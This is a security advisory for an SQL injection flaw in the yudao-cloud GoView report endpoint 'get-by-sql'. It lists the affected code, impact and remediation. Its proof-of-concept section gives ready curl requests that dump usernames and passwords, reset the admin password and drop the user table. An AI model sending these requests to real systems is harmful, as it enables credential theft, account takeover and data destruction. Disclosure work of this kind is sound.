# CVE Report: yudao-cloud GoView SQL Injection Vulnerability #2 ## Vulnerability Overview * **Vulnerability Title**: [High] yudao-cloud GoView SQL Injection * **Vulnerability Type**: SQL Injection (CWE-89) * **Severity**: High (CVSS 3.1: 8.6) * **Affected Product**: yudao-cloud * **Affected Versions**: 2026.01 and earlier * **Vulnerability Description**: A critical SQL injection vulnerability exists in `GoViewDataServiceImpl.java` of `yudao-cloud`. This flaw allows authenticated users with the `report:go-view-data:get-by-sql` permission to execute arbitrary SQL queries, potentially leading to unauthorized data access, data tampering, and database compromise. The `getDataySQL` method directly executes user-provided SQL statements without any parameterization or input validation. ## Impact Scope * **Affected Components**: * **File**: `yudao-module-report/biz/src/main/java/io/github/ruoyi/report/service/impl/GoViewDataServiceImpl.java` * **Method**: `getDataySQL(String sql)` * **Controller**: `yudao-module-report/biz/src/main/java/io/github/ruoyi/report/controller/GoViewDataController.java` * **API Endpoint**: `POST /admin-api/report/go-view-data/get-by-sql` * **Attack Vector**: 1. **Authentication**: Attacker must possess the `report:go-view-data:get-by-sql` permission. 2. **Injection**: Attacker sends malicious SQL via the `sql` parameter. 3. **Execution**: Server executes the injected SQL query. 4. **Impact**: Attacker can extract, modify, or delete database data. * **Potential Impact**: 1. **Data Leakage**: Extract sensitive data (user credentials, financial information, etc.). 2. **Data Tampering**: Modify or delete database records. 3. **Database Compromise**: Execute arbitrary SQL commands. 4. **Denial of Service**: Drop tables or corrupt data. 5. **Lateral Movement**: Potentially access other systems via database links. ## Remediation Measures 1. **Use Parameterized Queries**: Replace direct execution with prepared statements. 2. **Whitelist-Based Validation**: Validate that SQL conforms to allowed whitelist patterns. 3. **Remove the Endpoint**: If the feature is unnecessary, remove the `get-by-sql` endpoint entirely. 4. **Additional Security Measures**: Implement input validation and sanitization, use prepared statements, enforce least privilege principle, enable database query logging and monitoring, implement rate limiting, add restrictions on SQL query length and complexity. ## Proof-of-Concept (PoC) Code **Step 1: Normal Usage (Legitimate Query)** ```bash curl -X POST "https://target.com/admin-api/report/go-view-data/get-by-sql" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer " \ -d '{"sql": "SELECT * FROM user LIMIT 10"}' ``` **Step 2: SQL Injection (Unauthorized Data Access)** ```bash # Extract user credentials curl -X POST "https://target.com/admin-api/report/go-view-data/get-by-sql" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer " \ -d '{"sql": "SELECT username, password FROM user"}' ``` **Step 3: SQL Injection (Data Tampering)** ```bash # Change user password curl -X POST "https://target.com/admin-api/report/go-view-data/get-by-sql" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer " \ -d '{"sql": "UPDATE user SET password = \"hacked\" WHERE username = \"admin\""}' ``` **Step 4: SQL Injection (Denial of Service)** ```bash # Drop table curl -X POST "https://target.com/admin-api/report/go-view-data/get-by-sql" \ -H "Content-Type: application/json" \ -H "Authorization: Bearer " \ -d '{"sql": "DROP TABLE user"}' ```